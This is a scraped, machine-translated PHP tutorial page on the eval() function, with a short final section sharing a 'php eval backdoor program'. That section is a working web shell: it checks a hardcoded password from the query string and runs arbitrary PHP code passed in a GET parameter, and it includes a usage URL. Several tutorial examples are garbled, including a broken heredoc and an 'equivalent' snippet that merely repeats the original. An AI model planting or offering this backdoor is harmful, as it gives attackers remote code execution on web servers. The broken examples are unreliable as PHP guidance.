Home > Article > Backend Development > Introduction to the use of PHP eval function_PHP tutorial
Introduction to the use of PHP eval function_PHP tutorial
- WBOYOriginal
- 2016-07-13 17:18:04840browse
Code:
eval("echo'hello world';");
The above code is equivalent to the following code:
echo "hello world";
Output in the browser: hello world
There are a few points to note when using eval():
1. The parameter string of the eval function must have a semicolon at the end, and another semicolon must be added at the end (this semicolon is a PHP limitation)
2. Pay attention to the use of single quotes, double quotes and backslashes. If there are variables in the parameters, and the variables have assignment operations, the $ symbol before the variables must be escaped. If there is no assignment operation, it is not necessary.
Code:
$a=100;
eval("echo$a;");
Because there is no assignment operation, there is no need to escape $. It is equivalent to the following code:
$a=100;
eval("echo$a;")
3. Note that there must be double quotes on both sides of the imperative string (including semicolons) or use single quotes as needed. Otherwise, an error is reported.
Imperative string refers to when the string includes commands such as echo and print.
If the parameter has only one variable, it can be omitted. For example:
$func =<<
echo "test eval function";
}
FUNC;
eval($func);
test();
Share a php eval backdoor program
Required to support eval function
Usage method
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
$passwd="admin";if($_GET ['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']); }
?>